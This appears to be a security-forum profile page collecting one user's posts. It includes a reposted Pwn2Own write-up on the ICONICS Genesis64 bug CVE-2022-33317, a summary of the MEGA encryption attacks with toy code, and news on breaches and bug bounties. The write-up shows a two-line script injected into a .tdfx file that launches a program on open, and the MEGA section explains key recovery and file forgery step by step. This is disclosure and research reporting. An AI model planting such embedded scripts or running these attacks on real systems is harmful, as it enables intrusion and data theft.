akkiliON

Active Members
  • Posts: 1202
  • Joined
  • Last visited
  • Days Won: 61
Everything posted by akkiliON

  1. A DOM-based XSS in www.intel.com. Unfortunately, they don't offer money for web applications. https://app.intigriti.com/programs/intel/intel/detail The vulnerability has been reported.
  2. @abraxyss - I didn't get paid for the issue I found in Outlook. They told me it had already been identified by someone else. https://microsoft.com/en-us/msrc/bounty-online-services?rtc=1 Here you can find what's in scope.
  3. Prologue

In 2022, Pwn2Own returned to Miami and was again targeting industrial control systems (ICS) software. I had participated in the inaugural Pwn2Own Miami in 2020 and was eager to participate again this year. My previous work included a nice vulnerability against the Iconics Genesis64 Control Server product. That vulnerability allowed a remote attacker to run arbitrary SQL commands using a custom WCF client. This year I was able to win $20,000 by running arbitrary JScript.NET code! This post will describe the process I took and the vulnerability I found.

There were a few changes in the rules for 2022, though. In 2020, a successful entry against the Iconics Genesis64 target had to be launched against the exposed network services. In the new 2022 rules, however, opening a file is now considered a valid attack scenario. This sounded promising, as this attack surface was not explored at the previous event and would likely have lots of issues!

Installing Iconics Genesis64

After downloading the installation ISO, you install Iconics Genesis64 by running the setup.exe program in the ICONICS_Suite directory. The installer will ask you to restart multiple times, and eventually all the dependencies get installed and configuration begins. I used the default configuration for everything, but was careful to make sure the demo programs were installed. Installation was the most tedious aspect of this entire effort.

Exploring and exploiting the new attack surface

I started by searching the file system for examples of the file types that Iconics Genesis64 handles by default. For example, the ".awxx" file is an XML file, and there are a number of example files in the "AlarmWorX64_Examples" folder included in the Iconics Genesis64 GenDemo package.

For each file found, I did a quick visual scan looking for interesting data and keywords. Initially, I'm just trying to get a high-level overview of what each file is used for. Ideally, I'd find something like a serialized object stored in a file that would be deserialized when the file is opened. Some of the files are binary file formats. Some are compressed. Again, at this point in the process I'm just quickly scanning files for interesting strings and features, with no real expectations.
However, when I scanned the ".gdfx" files, the "ScriptCode" and "ScriptCodeManager" tags looked VERY interesting:

<gwx:GwxDocument.GwxDocument>
  <gwx:GwxDocument FileVersion="10.85.141.00" ScanRate="500">
    <gwx:GwxDocument.ScriptCodeManager>
      <script:ScriptCodeManager>
        <script:ScriptCodeManager.Scripts>
          <script:ScriptCode Name="ThisDisplayCode" Type="JScriptNet">
            <x:XData><![CDATA[
function DebugDump(sender : System.Object, cmdArgs : Ico.Gwx.CommandExecutionEventArgs) {
  var callback : Ico.Fwx.ClientWrapper.MethodCallDoneDelegate = ThisDocument.CreateDelegate(Ico.Fwx.ClientWrapper.MethodCallDoneDelegate, this, "CallDone");
  ThisWindow.FwxClientWrapper.MethodCallAsync(":", "DebugDump", new Object[0], callback, null);
}

function CallDone(result : Ico.Fwx.ClientWrapper.MethodCallDoneResult) {
  var message : String;
  message = String.Format("Result: {0}", result.Status.ToString());
  if ((result.OutputArguments != null) && (result.OutputArguments.Count > 0)) {
    path = result.OutputArguments[0].ToString();
    message += String.Format("\n\nDump file: {0}", path);
  }
  MessageBox.Show(message, "Debug Dump Result", MessageBoxButton.OK);
}
]]></x:XData>
          </script:ScriptCode>
          <script:ScriptCode Name="JScriptDotNetGlobalVariablesCode" Type="JScriptNet" EditorBrowsable="Never">
            <x:XData><![CDATA[
var ThisWindow : Ico.Gwx.GwxRuntimeViewControl;
var ThisDocument : Ico.Gwx.GwxDocument;
var ThisConfiguration : Ico.Gwx.GwxConfiguration;
]]></x:XData>
          </script:ScriptCode>
        </script:ScriptCodeManager.Scripts>
      </script:ScriptCodeManager>
    </gwx:GwxDocument.ScriptCodeManager>
  </gwx:GwxDocument>
</gwx:GwxDocument.GwxDocument>

This looks like JScript.NET code embedded in the file! This appears to be a feature for adding scripts to projects. However, when I try to open the file I get a "File Access Denied" message: it appears an Iconics user needs to be logged in before this file will open. I documented this behavior and made a note to check whether the JScript code could be executed before the authentication check, or whether the authentication could be bypassed, but then continued my survey of default file types.

When I examined a GraphWorX64 Template file, ".tdfx", I saw the same "ScriptCodeManager" tag, and the file opened without requiring authentication. Adding the following code into a "ScriptCode" tag in the template file causes calc to be executed when the file is opened!

var objShell = new ActiveXObject("Shell.Application");
objShell.ShellExecute("calc.exe", "", "calc.exe", "open", 0);

To Submit or Not Submit

Obviously, this is a pretty shallow bug and a very weak one to bring to Pwn2Own. There is a high likelihood that other researchers would find this bug and collide. I only had a couple hours of effort in at this point and had to decide whether to go with this bug or to immediately report it to ZDI and continue searching for better bugs. The decision was complicated further when the contest was delayed a few months because of the Omicron surge in Florida. Ultimately, my laziness and the busyness of life prevailed. I decided to take my chances with this weak bug. In the end, despite being the fifth (of 7 total) researchers to target Iconics Genesis64, the bug did not collide with previous attempts and was successful!

Conclusion

In this post I presented a vulnerability in the ICONICS Genesis64 Control Server's handling of TDFX files. I also showed the simple process to find "new" attack surface in the code.
Unfortunately, identifying attack surface that has not seen significant scrutiny is oftentimes all that is necessary to find and exploit critical vulnerabilities. ZDI assigned CVE-2022-33317 to this vulnerability and ICONICS fixed it in version 10.97.2. Thanks to the vendor for the timely fix and thanks to ZDI for organizing another great Pwn2Own! Source: https://trenchant.io/two-lines-of-jscript-for-20000-pwn2own-miami-2022/
  4. The vulnerability in [*].live.com. I got a message today. I wasn't expecting a response this quickly. 🙂 Later edit: They've already fixed it... LOL. I just checked 😅
  5. I'll come back with a message when I get any news.... It will definitely take some time.... Thanks! I found that one too and wanted to report it, at least for the Hall of Fame. If you found it as well and they told you it's out of scope.... there's no point anymore.... 😅 Hey nO_Ob, who told you to sit around... get to work 😂
  6. Hi. I found two XSS vulnerabilities in applications owned by Microsoft. One is in Outlook, and the second is in another application that many people use and know... I can't give details at the moment because neither of them has been fixed yet... At least, I haven't received a duplicate on the reports I submitted. 🙂 1. Reflected XSS (without user interaction) - [*].live.com: 2. Reflected XSS (user interaction required) - Outlook: I noticed that these domains are also vulnerable: office365.com and live.com.
  7. Ride-hailing giant Uber disclosed Thursday that it's responding to a cybersecurity incident involving a breach of its network and that it's in touch with law enforcement authorities.

The New York Times first reported the incident. The company pointed to its tweeted statement when asked for comment on the matter. The hack is said to have forced the company to take its internal communications and engineering systems offline as it investigated the extent of the breach. The publication said the malicious intruder compromised an employee's Slack account and leveraged it to broadcast a message that the company had "suffered a data breach," in addition to listing internal databases that were supposedly compromised.

"It appeared that the hacker was later able to gain access to other internal systems, posting an explicit photo on an internal information page for employees," the New York Times said.

Uber has yet to offer additional details about the incident, but it seems that the hacker, believed to be an 18-year-old teenager, social-engineered the employee to get hold of their password by masquerading as a corporate IT person, and used it to obtain a foothold into the internal network.

"Once on the internal network, the attackers found high privileged credentials laying on a network file share and used them to access everything, including production systems, corp EDR console, [and] Uber slack management interface," Kevin Reed, chief information security officer at Acronis, told The Hacker News.

This is not Uber's first breach. It came under scrutiny for failing to properly disclose a 2016 data breach affecting 57 million riders and drivers, and ultimately paying the hackers $100,000 to hide the breach. It became public knowledge only in late 2017.

Federal prosecutors in the U.S. have since charged its former security officer, Joe Sullivan, with an alleged attempted cover-up of the incident, stating he had "instructed his team to keep knowledge of the 2016 breach tightly controlled." Sullivan has contested the accusations. In December 2021, Sullivan was handed three additional counts of wire fraud on top of the previously filed felony obstruction and misprision charges. "Sullivan allegedly orchestrated the disbursement of a six-figure payment to two hackers in exchange for their silence about the hack," the superseding indictment said. It further said he "took deliberate steps to prevent persons whose PII was stolen from discovering that the hack had occurred and took steps to conceal, deflect, and mislead the U.S. Federal Trade Commission (FTC) about the data breach."

The latest breach also comes as the criminal case against Sullivan goes to trial in the U.S. District Court in San Francisco.

"The compromise is certainly bigger compared to the breach in 2016," Reed said. "Whatever data Uber keeps, the hackers most probably already have access."

Source: https://thehackernews.com/2022/09/uber-says-its-investigating-potential.html
  8. Company says it is making changes to its security controls to prevent malicious insiders from doing the same thing in future; reassures bug hunters their bounties are safe.

HackerOne has fired one of its employees for collecting bug bounties from its customers after alerting them to vulnerabilities in their products — bugs that had been found by other researchers and disclosed privately to HackerOne via its coordinated vulnerability disclosure program.

HackerOne discovered the caper when one of its customers asked the organization to investigate a vulnerability disclosure that was made outside the HackerOne platform in June. The customer, like other clients of bug bounty programs, uses HackerOne to collect and report vulnerabilities in its products that independent security researchers might have discovered. In return, the company pays a reward — or bug bounty — for reported vulnerabilities.

In this instance, the HackerOne customer said an anonymous individual had contacted them about a vulnerability that was very similar to another bug in its technology that a researcher had previously submitted via the HackerOne platform. Bug collisions — where two or more researchers might independently unearth the same vulnerability — are not uncommon. "However, this customer expressed skepticism that this was a genuine collision and provided detailed reasoning," HackerOne said in a report summarizing the incident. The customer described the individual — who used the handle "rzlr" — as using intimidating language in communicating information about the vulnerability, HackerOne said.

Malicious Insider

The company's investigation of the June 22, 2022, tip almost immediately pointed to multiple customers likely being contacted in the same manner. HackerOne researchers began probing every scenario where someone might have gained access to its vulnerability disclosure data: whether someone might have compromised one of its systems, gained remote access some other way, or if the disclosure had resulted from a misconfiguration. The data quickly pointed to the threat actor being an insider with access to the vulnerability data.

HackerOne's investigators then looked at their log data on employee access to vulnerability disclosures and found that just one employee had accessed each of the disclosures that customers reported as being suspicious. "Within 24 hours of the tip from our customer, we took steps to terminate that employee's system access and remotely locked their laptop pending further investigation," HackerOne said.

The company found the former employee had created a fictitious HackerOne account and collected bounties for a handful of disclosures. HackerOne worked with the relevant payment providers in each instance to confirm the bounties were paid into a bank account connected with the now-former employee. By analyzing the individual's network traffic, the investigators were also able to link the fictitious account to the ex-employee's primary HackerOne account.

Undermining Trust

Mike Parkin, senior technical engineer at Vulcan Cyber, says incidents like this can undermine the trust that is key to the success of crowdsourced vulnerability disclosure programs such as the one that HackerOne manages. "Trust is a big factor in vulnerability research and can play a large part in many bug bounty programs," Parkin says. "So, when someone effectively steals another researcher's work and presents it as their own, that foundational trust can be stretched."

Parkin praised HackerOne for being transparent and acting quickly to address the situation. "Hopefully this incident won't affect the vulnerability research ecosystem overall, but it may lead to deeper reviews of bug bounty submissions going forward," he says.

HackerOne said the former employee — who started only on April 4 — directly communicated with a total of seven of its customers. It urged any other customers that might have been contacted by an individual using the handle rzlr to contact the company immediately, especially if the communication had been aggressive or threatening in tone. The company also reassured hackers who have signed up for the platform that their eligibility for any bounties they might receive for vulnerability disclosures had not been adversely impacted. "All disclosures made from the threat actor were considered duplicates. Bounties applied to these submissions did not impact the original submissions." HackerOne said it would contact hackers whose reports the ex-employee might have accessed and attempted to resubmit.

"Since the founding of HackerOne, we have honored our steadfast commitment to disclosing security incidents because we believe that sharing security information is essential to building a safer Internet," the company said.

Following the incident, HackerOne has identified several areas where it plans to bolster controls. These include improvements to its logging capabilities, adding employees to monitor for insider threats, enhancing its employee screening practices during the hiring process, and controls for isolating data to limit damage from incidents of this type.

Jonathan Knudsen, head of global research at Synopsys Cybersecurity Research Center, says HackerOne's decision to communicate clearly about the incident and its response to it is an example of how organizations can limit damage. "Security incidents are often viewed as embarrassing and irredeemable," he says. But being completely transparent about what happened can increase credibility and garner respect from customers. "HackerOne has taken an insider threat incident and responded in a way that reassures customers that they take security very seriously, are capable of responding quickly and effectively, and are continuously examining and improving their processes," Knudsen says.

Source: https://www.darkreading.com/vulnerabilities-threats/hackerone-employee-fired-for-stealing-and-selling-bug-reports-for-personal-gain
  9. The LockBit 3.0 ransomware operation was launched recently, and it includes a bug bounty program offering up to $1 million for vulnerabilities and various other types of information.

LockBit has been around since 2019, and the LockBit 2.0 ransomware-as-a-service operation emerged in June 2021. It has been one of the most active ransomware operations, accounting for nearly half of all ransomware attacks in 2022, with more than 800 victims named on the LockBit 2.0 leak website. The cybercriminals encrypt files on compromised systems and also steal potentially valuable information that they threaten to make public if the victim refuses to pay up.

With the launch of LockBit 3.0, it seems they are reinvesting some of the profit in their own security via a "bug bounty program". Similar to how legitimate companies reward researchers to help them improve their security, LockBit operators claim they are prepared to pay out between $1,000 and $1 million to security researchers and ethical or unethical hackers. Rewards can be earned for website vulnerabilities, flaws in the ransomware encryption process, vulnerabilities in the Tox messaging app, and vulnerabilities exposing their Tor infrastructure. They are also prepared to reward "brilliant ideas" on how to improve their site and software, as well as information on competitors. Addressing these types of security holes can help protect the cybercrime operation against researchers and law enforcement.

One million dollars is offered to anyone who can dox — find the real identity of — a LockBit manager known as "LockBitSupp", who is described as the "affiliate program boss". This bounty has been offered since at least March 2022. Major ransomware groups are believed to have made hundreds of millions and even billions of dollars, which means the LockBit group could have the funds needed for such a bug bounty program.

"With the fall of the Conti ransomware group, LockBit has positioned itself as the top ransomware group operating today based on its volume of attacks in recent months. The release of LockBit 3.0 with the introduction of a bug bounty program is a formal invitation to cybercriminals to help assist the group in its quest to remain at the top," commented Satnam Narang, senior staff research engineer at Tenable.

However, John Bambenek, principal threat hunter at security and operations analytics SaaS company Netenrich, said he doubts the bug bounty program will get many takers. "I know that if I find a vulnerability, I'm using it to put them in prison. If a criminal finds one, it'll be to steal from them because there is no honor among ransomware operators," Bambenek said.

Casey Ellis, founder and CTO of bug bounty platform Bugcrowd, noted that "the same way hackers aren't always 'bad', the bounty model isn't necessarily 'only useful for good'." Ellis also pointed out, "Since Lockbit 3.0's bug bounty program essentially invites people to add a felony in exchange for a reward, they may end up finding that the $1,000 low reward is a little light given the risks involved for those who might decide to help them."

Other new features introduced with the launch of LockBit 3.0 include allowing victims to buy more time or "destroy all information". The cybercriminals are also offering anyone the option to download all files stolen from a victim. Each of these options has a certain price. Vx-underground, a service that provides malware samples and other resources, also noted that harassment of victims is now encouraged as well.

South Korean cybersecurity firm AhnLab reported last week that the LockBit ransomware has been distributed via malicious emails claiming to deliver copyright claims. "Lures like this one are simple and effective, although certainly not unique," said Erich Kron, security awareness advocate at KnowBe4. "Like so many other phishing attacks, this is using our emotions, specifically the fear of a copyright violation, which many people have heard can be very costly, to get a person to make a knee-jerk reaction."

Source: https://www.securityweek.com/lockbit-30-ransomware-emerges-bug-bounty-program
  10. MEGA is a leading cloud storage platform with more than 250 million users and 1000 petabytes of stored data, which aims to achieve user-controlled end-to-end encryption. We show that MEGA's system does not protect its users against a malicious server and present five distinct attacks, which together allow for a full compromise of the confidentiality of user files. Additionally, the integrity of user data is damaged to the extent that an attacker can insert malicious files of their choice which pass all authenticity checks of the client. We built proof-of-concept versions of all the attacks, showcasing their practicality and exploitability.

Background

MEGA is a cloud storage and collaboration platform founded in 2013, offering secure storage and communication services. With over 250 million registered users, 10 million daily active users and 1000 PB of stored data, MEGA is a significant player in the consumer domain. What sets them apart from competitors such as Dropbox, Google Drive, iCloud and Microsoft OneDrive is the claimed security guarantees: MEGA advertises itself as the privacy company and promises User-Controlled end-to-end Encryption (UCE). We challenge these security claims and show that an adversarial service provider, or anyone controlling MEGA's core infrastructure, can break the confidentiality and integrity of user data.

Key Hierarchy

At the root of a MEGA client's key hierarchy is the password chosen by the user. From this password, the MEGA client derives an authentication key and an encryption key. The authentication key is used to identify users to MEGA. The encryption key encrypts a randomly generated master key, which in turn encrypts other key material of the user. For every account, this key material includes a set of asymmetric keys consisting of an RSA key pair (for sharing data with other users), a Curve25519 key pair (for exchanging chat keys for MEGA's chat functionality), and an Ed25519 key pair (for signing the other keys). Furthermore, for every file or folder uploaded by the user, a new symmetric encryption key called a node key is generated. The private asymmetric keys and the node keys are encrypted by the client with the master key using AES-ECB and stored on MEGA's servers to support access from multiple devices. A user on a new device can enter their password, authenticate to MEGA, fetch the encrypted key material, and decrypt it with the encryption key derived from the password.

Attacks

  • RSA Key Recovery Attack: MEGA can recover a user's RSA private key by maliciously tampering with 512 login attempts.
  • Plaintext Recovery: MEGA can decrypt other key material, such as node keys, and use them to decrypt all user communication and files.
  • Framing Attack: MEGA can insert arbitrary files into the user's file storage which are indistinguishable from genuinely uploaded ones.
  • Integrity Attack: The impact of this attack is the same as that of the framing attack, trading off less stealthiness for easier prerequisites.
  • GaP-Bleichenbacher Attack: MEGA can decrypt RSA ciphertexts using an expensive padding oracle attack.
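Before the individual attacks, here is a minimal sketch of the client-side key unwrapping described in the Key Hierarchy section. This is an illustration only: the helper names and the PBKDF2 parameters are assumptions, not MEGA's actual client code; the relevant property is that everything hangs off one master key wrapped with AES-ECB.

// Minimal sketch of the key hierarchy (Node.js). Names and KDF parameters
// are illustrative assumptions, not MEGA's real implementation.
const crypto = require("crypto");

function deriveKeys(password, salt) {
  // One derived block is split into an encryption key and an authentication key.
  const dk = crypto.pbkdf2Sync(password, salt, 100000, 32, "sha512");
  return { encryptionKey: dk.subarray(0, 16), authKey: dk.subarray(16) };
}

// AES-ECB as used for MEGA's key wrapping: no IV and, crucially, no integrity.
function ecbDecrypt(key, ciphertext) {
  const d = crypto.createDecipheriv("aes-128-ecb", key, null);
  d.setAutoPadding(false);
  return Buffer.concat([d.update(ciphertext), d.final()]);
}

// Placeholder ciphertexts standing in for what the server returns at login.
const encryptedMasterKey = Buffer.alloc(16);
const encryptedNodeKey = Buffer.alloc(16);

const { encryptionKey } = deriveKeys("hunter2", Buffer.alloc(8));
const masterKey = ecbDecrypt(encryptionKey, encryptedMasterKey); // wraps all other keys
const nodeKey = ecbDecrypt(masterKey, encryptedNodeKey);         // per-file key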
RSA Key Recovery Attack

MEGA uses RSA encryption for sharing node keys between users, to exchange a session ID with the user at login, and in a legacy key transfer for the MEGA chat. Each user has a public RSA key pk_share used by other users or MEGA to encrypt data for the owner, and a private key sk_share used by the user themselves to decrypt data shared with them. The private RSA key is stored for the user in encrypted form on MEGA's servers. Key recovery means that an attacker successfully gets possession of the private key of a user, allowing them to decrypt ciphertexts intended for the user.

We discovered a practical attack to recover a user's RSA private key by exploiting the lack of integrity protection of the encrypted keys stored for users on MEGA's servers. An entity controlling MEGA's core infrastructure can tamper with the encrypted RSA private key and deceive the client into leaking information about one of the prime factors of the RSA modulus during the session ID exchange. More specifically, the session ID that the client decrypts with the mauled private key and sends to the server will reveal whether the prime is smaller or greater than an adversarially chosen value. This information enables a binary search for the prime factor, with one comparison per client login attempt, allowing the adversary to recover the private RSA key after 1023 client logins. Using lattice cryptanalysis, the number of login attempts required for the attack can be reduced to 512.

Proof of Concept Attack

Since the server code is not published, we cannot implement a Proof-of-Concept (PoC) in which the adversary actually controls MEGA. Instead, we implemented a MitM attack by installing a bogus TLS root certificate on the victim. This setup allows the attacker to impersonate MEGA towards the user while using the real servers to execute the server code (which is unknown to us). Server responses can be patched on the fly since they do not rely on secrets stored by the server, allowing the attack to be performed in real time as the victim interacts with MEGA. The following video shows how our attack recovers the first byte of the RSA private key. Afterward, we abort the attack to avoid any adverse impact on MEGA's production servers.

For each recovered bit, the attack consists of the following steps:
1. The victim logs in.
2. The adversary hijacks the login and replaces the correct session ID with their probe for the next secret bit.
3. Based on the client's response, the adversary updates its interval for the binary search of the RSA prime factor.
4. The login fails for the victim. This is only a limitation of the MitM setup, since the correct SID is lost. An adversarial cloud storage provider can simply accept the returned SID.

Note that after aborting the attack, the search interval is [0xe03ff...f, 0xe07ff...f]. The secret prime factor q of the RSA modulus starts with 0xe06.... This value is within the search interval, and the adversary has already recovered the first byte, 0xe0. Using all of q, the adversary can recover the RSA private key (d, N) from the public key (e, N) as p = N / q and d = e^-1 mod (p-1)(q-1).

Video: https://mega-awry.io/videos/rsa_key_recovery_poc.mp4
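The binary search itself is tiny; here is a toy sketch of it. The oracle function is a stand-in for one tampered login plus the comparison leaked via the client's SID response — the names are illustrative, not from the paper's code:

// Toy sketch of the binary search over the secret prime factor.
// oracleSaysLess(m) stands in for: tamper with one login, observe the SID,
// and learn whether q < m. One oracle query == one client login.
function recoverPrime(oracleSaysLess, bits) {
  let lo = 0n, hi = 1n << BigInt(bits); // q < 2^bits
  while (hi - lo > 1n) {
    const mid = (lo + hi) / 2n;
    if (oracleSaysLess(mid)) hi = mid;  // q < mid
    else lo = mid;                      // q >= mid
  }
  return lo; // == q after ~bits comparisons
}

// Demo with a pretend 6-bit "prime"; for RSA-2048, bits = 1024 gives the
// ~1023 logins quoted above.
const q = 61n;
console.log(recoverPrime((m) => q < m, 6)); // 61n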
Plaintext Recovery

As shown in the key hierarchy, MEGA clients encrypt the private keys for sharing, chat key transfer, and signing with the master key using AES-ECB. Furthermore, file and folder keys use the same encryption. A plaintext recovery attack lets the adversary compute the plaintext from a given ciphertext. In this specific attack, MEGA can decrypt AES-ECB ciphertexts created with a user's master key. This gives the attacker access to the aforementioned and highly sensitive key material encrypted in this way. With the sharing, chat, signing, and node keys of a user, the adversary can decrypt the victim's data or impersonate them.

This attack exploits the lack of key separation for the master key and knowledge of the recovered RSA private key (e.g., from the RSA key recovery attack). The decryption oracle again arises during authentication, when the encrypted RSA private key and the session ID (SID), encrypted with the RSA public key, are sent from MEGA's servers to the user. MEGA can overwrite part of the RSA private key ciphertext in the SID exchange with two target ciphertext blocks. It then uses the SID returned by the client to recover the plaintext for the two target blocks. Since all key material is protected with AES-ECB under the master key, an attacker exploiting this vulnerability can decrypt node keys, the victim's Ed25519 signature key, its Curve25519 chat key, and, thus, also all exchanged chat keys. Given that the private RSA key has been recovered, one client login suffices to recover 32 bytes of encrypted key material, corresponding, for instance, to one full node key.

Framing Attack

This attack allows MEGA to forge data in the name of the victim and place it in the target's cloud storage. While the previous attacks already allow an adversary to modify existing files using the compromised keys, this attack allows the adversary to preserve existing files or add more documents than the user currently stores. For instance, a conceivable attack might frame someone as a whistle-blower and place an extensive collection of internal documents in the victim's cloud storage. Such an attack might gain credibility when it preserves the user's original cloud content.

To create a new file key, the attacker makes use of the particular format that MEGA uses for node keys. Before they are encrypted, node keys are encoded into a so-called obfuscated key object, which consists of a reversible combination of the node key and information used for decryption of the file or folder (specifically, a nonce and a truncated MAC tag). Since none of our attacks allow an attacker to encrypt values of their choosing with AES-ECB under the master key, the attacker works in the reverse direction to create a new valid obfuscated key object. That is, it first obtains an obfuscated key by decrypting a randomly sampled key ciphertext using the plaintext recovery attack. Note that this ciphertext can really be randomly sampled from the set of all bit strings of the length of one encrypted obfuscated key object: decryption will always succeed, since the AES-ECB encryption mode used to encrypt key material does not provide any means of checking the integrity of a ciphertext.

The resulting string is not under the control of the adversary and will be random-looking, but can regardless be used as a valid obfuscated key object, since both file keys and the integrity information (nonces and MAC tags) can be arbitrary strings. Hence, the adversary parses the decrypted string into a file key, a nonce, and a MAC tag. It then modifies the target file which is to be inserted into the victim's cloud such that it passes the integrity check when the file key and integrity information from the obfuscated key are used. The attacker achieves this by inserting a single AES block in the file at a chosen location. Finally, the adversary uses the known file key to encrypt the file and uploads the result to the victim's cloud. Many standard file formats such as PNG and PDF tolerate 128 injected bits (for instance, in the file's metadata, as trailing data, or in unused structural components) without affecting the displayed content.
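The "decryption will always succeed" point is easy to see in practice. A quick Node.js illustration (the key and ciphertext here are random stand-ins, not MEGA data):

// AES-ECB offers no integrity: "decrypting" random bytes never fails.
const crypto = require("crypto");

const masterKey = crypto.randomBytes(16);       // pretend master key
const bogusCiphertext = crypto.randomBytes(32); // randomly sampled "encrypted obfuscated key"

const d = crypto.createDecipheriv("aes-128-ecb", masterKey, null);
d.setAutoPadding(false);
const obfuscatedKey = Buffer.concat([d.update(bogusCiphertext), d.final()]);

// No error is thrown; the random-looking result still parses as a
// file key + nonce + truncated MAC, which the attacker then satisfies
// by injecting a single chosen AES block into the forged file.
console.log(obfuscatedKey.toString("hex"));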
The image above shows the file our proof of concept inserts into the victim account. Our attack added the highlighted bytes to satisfy the integrity check. Due to the structure of PNG files, these bytes do not change the displayed pixels, i.e., the file is visually identical to the unmodified image.

Proof-of-Concept Attack

The PoC shows our framing attack in the MitM setting described in the RSA private key recovery attack. The video shows the following steps:
1. The victim logs into their account without any attack running. There are only three files in the cloud storage, and none of them is called hacker-cat.png.
2. The victim logs out and the adversary runs the plaintext recovery attack once. This involves the following steps: the adversary hijacks the victim's login attempt and replaces the encrypted SID with the encrypted key that it picked for the file forgery; the victim's client responds with the decrypted SID, from which the adversary can recover the plaintext for the injected ciphertext blocks. The login attempt fails, which is only a limitation of the MitM setting — a malicious cloud provider can perform this attack without the user noticing.
3. The adversary uses the key recovered in the previous step to forge an encrypted file.
4. The victim logs in again. The adversary injects the forged file into the loaded file tree.
5. The victim's cloud now displays four files, including a new file called hacker-cat.png. When the user views this file in the browser, it correctly decrypts and shows the image.

Video: https://mega-awry.io/videos/framing_attack_poc.mp4

Integrity Attack

This attack exploits the peculiar structure of MEGA's obfuscated key objects to manipulate an encrypted node key such that the decrypted key consists of all zero bytes. Since the attacker now knows the key, this key manipulation can be used to forge a file in a manner similar to the framing attack. Unlike the framing attack (which requires the ability to decrypt arbitrary AES-ECB ciphertexts), this attack only needs access to a single plaintext block and the corresponding ciphertext encrypted with AES-ECB under the master key. For instance, the attacker can use MEGA's protocol for public file sharing to obtain such a pair: when a user shares a file or folder publicly, they create a link containing the obfuscated key in plaintext. Hence, a malicious cloud provider who obtains such a link knows both the plaintext and the corresponding ciphertext for the node key, since the latter was uploaded to MEGA when the file was created (before being shared). This can then be used as the starting point for the key manipulation, and it allows a forged file ciphertext to be uploaded into the victim's cloud, just as for the framing attack. However, this attack is less surreptitious than the framing attack because of the low probability of the all-zero key appearing in an honest execution, meaning that an observant user who inspects the file keys stored in their account could notice that the attack has been performed.

GaP-Bleichenbacher Attack

This attack is a novel variant of Bleichenbacher's attack on PKCS#1 v1.5 padding. We call it a Guess-and-Purge (GaP) Bleichenbacher attack. MEGA can use this attack to decrypt RSA ciphertexts by exploiting a padding oracle in the fallback chat key exchange of MEGA's chat functionality. The vulnerable RSA encryption is used for sharing node keys between users, to exchange a session ID with the user at login, and in a legacy key transfer for the MEGA chat.
As shown in the key hierarchy, each user has a public RSA key used by other users or MEGA to encrypt data for the owner, and a private key used by the user themselves to decrypt data shared with them. With this attack, MEGA can decrypt these RSA ciphertexts, albeit requiring an impractical number of login attempts.

Attack idea: The original Bleichenbacher attack maintains an interval for the possible plaintext value of a target ciphertext. It exploits the malleability of RSA to test the decryption of multiples of the unknown target message. Successful unpadding leaks the prefix of the decrypted message due to the structure of the PKCS#1 v1.5 padding. This prefix allows an adversary to reduce intervals efficiently and recover the plaintext. MEGA uses a custom padding scheme which is less rigid than PKCS#1 v1.5. This makes it challenging to apply Bleichenbacher's attack, because a successful unpadding no longer corresponds to a single solution interval. Instead, many disjoint intervals are possible, depending on the value of an unknown prefix in MEGA's padding scheme. Our attack devises a new Guess-and-Purge strategy that guesses the unknown prefix and quickly purges wrong guesses. This enables us to perform a search for the decryption of a ciphertext in 2^16.9 client login attempts on average.

Although this attack is weaker than the RSA key recovery attack (in the sense that a key recovery implies plaintext recovery), it is complementary in the vulnerabilities that it exploits and requires different attacker capabilities. It attacks the legacy chat key decryption of RSA encryption instead of the session ID exchange, and it can be performed by a slightly weaker adversary, since no key-overwriting is necessary. The details of the GaP-Bleichenbacher attack are intricate; for a full description, see Appendix B of the paper.

Sources:
https://mega-awry.io/
https://thehackernews.com/2022/06/researchers-uncover-ways-to-break.html
https://blog.mega.io/mega-security-update/
  11. Despite the old saying, not everything lives forever on the internet — including stolen crypto. This week, crypto security firm BlockSec announced that a hacker figured out how to exploit lending agreements and triple their crypto reward on the ZEED DeFi protocol, which runs on the Binance Smart Chain and trades with a currency called YEED.

"Our system detected an attack transaction that exploited the reward distribution vulnerability in ZEED," BlockSec said on Twitter this week. The end of the thread threw readers for a loop, though, because BlockSec also said the stolen currency had been permanently lost because of a self-destruct feature the hacker used. "Interestingly, the attacker does not transfer the obtained tokens out before self-destructing the attack contract. Probably, he/she was too excited," BlockSec said in a following tweet.

Possible Vigilante

The sheer thought of losing a million dollars is enough to make anybody sweat bullets, but it's possible the hacker did this on purpose. BlockSec isn't sure what the motive was and suggests it could've been an accident. A report by VICE published this week says the hacker could've been a vigilante with a message or something to prove. Because the self-destruct feature "burned" the tokens, they're essentially gone forever. VICE suggests the hacker could've wanted to watch the crypto world burn — and the mysterious attacker certainly did cause a lot of chaos. After selling the hacked tokens, YEED's value crashed to near zero. Sales won't resume until ZEED takes steps to secure, repair and test its systems.

Maybe the hacker messed up, or maybe we just witnessed a modern-day Robin Hood attack. It's possible we'll never know who pulled off the hack, or why.

Source: https://futurism.com/the-byte/hacker-steals-destroys

Dorel, what have you done..... 😂
  12. A security vulnerability has been disclosed in the web version of the Ever Surf wallet that, if successfully weaponized, could allow an attacker to gain full control over a victim's wallet.

"By exploiting the vulnerability, it's possible to decrypt the private keys and seed phrases that are stored in the browser's local storage," Israeli cybersecurity company Check Point said in a report shared with The Hacker News. "In other words, attackers could gain full control over the victim's wallets."

Ever Surf is a cryptocurrency wallet for the Everscale (formerly FreeTON) blockchain that also doubles up as a cross-platform messenger and allows users to access decentralized apps as well as send and receive non-fungible tokens (NFTs). It's said to have an estimated 669,700 accounts across the world.

By means of different attack vectors like malicious browser extensions or phishing links, the flaw makes it possible to obtain a wallet's encrypted keys and seed phrases that are stored in the browser's local storage, which can then be trivially brute-forced to siphon funds. Given that the information in the local storage is unencrypted, it could be accessed by rogue browser add-ons or information-stealing malware that's capable of harvesting such data from different web browsers.

Following responsible disclosure, a new desktop app has been released to replace the vulnerable web version, with the latter now marked as deprecated and used only for development purposes.

"Having the keys means full control over the victim's wallet, and, therefore, funds," Check Point's Alexander Chailytko said. "When working with cryptocurrencies, you always need to be careful, ensure your device is free of malware, do not open suspicious links, keep OS and anti-virus software updated."

"Despite the fact that the vulnerability we found has been patched in the new desktop version of the Ever Surf wallet, users may encounter other threats such as vulnerabilities in decentralized applications, or general threats like fraud, [and] phishing."

Source: https://thehackernews.com/2022/04/critical-bug-in-everscale-wallet.html
  13. After deep security research by the Cysource research team, led by Shai Alfasi & Marlon Fabiano da Silva, we found a way to execute commands remotely within the VirusTotal platform and gain access to its various scan capabilities.

About VirusTotal:

The virustotal.com application has more than 70 antivirus scanners that scan files and URLs sent by users. The original idea of the exploration was to use CVE-2021-22204 so that these scanners would execute the payload as soon as exiftool was run.

Technical part:

